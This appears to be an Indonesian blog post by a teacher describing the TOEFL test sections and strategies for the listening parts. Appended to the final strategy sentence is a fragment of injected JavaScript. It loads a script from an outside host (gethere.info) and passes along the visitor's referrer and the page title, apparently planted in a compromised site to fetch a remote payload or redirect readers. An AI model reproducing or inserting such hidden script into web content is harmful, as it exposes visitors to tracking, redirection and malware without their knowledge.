TOEFL merupakan test proficiency, yaitu tes yang digunakan untuk mengukur kemampuan bahasa Inggris seseorang tanpa dikaitkan secara langsung dengan proses belajar mengajar. Dengan demikian TOEFL berbeda dengan achievement test, yaitu tes yang di lingkup ujiannya terbatas pada bahan yang telah dipelajari siswa dalam satu kelas bahasa Inggris. TOEFL mencakup empat aspek yaitu (1) Listening Comprehension, (2) Structure and Written Expression, (3) Reading Comprehension, dan (4) Test of Written English.

Listening Comprehension (pemahaman dalam mendengarkan). Pada section ini bertujuan menguji kemampuan Anda dalam memahami bahasa lisan. Akan tetapi, untuk bisa memahami bahasa lisan tersebut, di samping harus membiasakan diri mendengarkan bahasa Inggris lisan, Anda harus memiliki pengetahuan struktur bahasa (tata bahasa) Inggris yang memadai. Pada tes ini terdiri dari tiga bagian dengan 50 pertanyaan.

Bagian A (PART A) terdiri dari 30 pertanyaan.

Bagian B (PART A) terdiri dari 7 sampai 18 pertanyaan.

Bagian C (PART C) terdiri dari 11 sampai 13 pertanyaan.

The Master Srategy

Pahami bentuk-bentuk perintah (direction) masing-masing bagian (part) denganbaik sebelum hari H ujian.

Bacalah pilihan pada masing-masing soal sebanyak mungkin ketika narator sedang mambacakan direction dan contoh soal (example)

Dengarkan dengan penuh konsentrasi dan fokuskan perhatian anda pada percakapan yang sedang anda dengarkan

Memaksimalkan kemampuan listening Anda pada soal-soal pertama pada masing-masing part.

 

Short Conversation

Strategy: PART A >> Short Conversation

Fokuskan pendengaran Anda pada orang kedua.

Jangan panik jika tidak bisa memahami kata demi kata dalam percakapan secara komplit. Anda hanya perlu menangkap ide atau isi percakapan.

Bila Anda sama sekali tidak bisa memahami apa yang dibicarakan pembicara kedua, pilihlah jawaban yang berbeda dari apa yang anda dengar.

Pahami bentuk-bentuk functional expression agreement (persetujuan), uncertainty (ketidakpastian), suggestion (sugesti), surprise (kejutan), idiomatic, expression, dan situasi ketika pembicaraan dilakukan.

 

Talk

Strategy: PART C >> Shor lecture / talk

Bila anda memiliki waktu, lihatlah pilihan-pilihan jawaban yang tertera pada lembar soal dan temukan kata kuncinya.

Waspadalah pembicaraan pada kalimat pertama karena biasanya akan menjadi topik bagi kalimat-kalimat selanjutnya.

Fokuskan pendengaran Anda pada hal-hal yang berkaitan dengan pertanyaan 5-W (What, who, when, where, why) and How.

Buatlah kesimpulan / interfasi atas situasi yang terjadi saat pembicaraan dilakukan.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About the author

Admin

teacher, blogger, entrepreneurship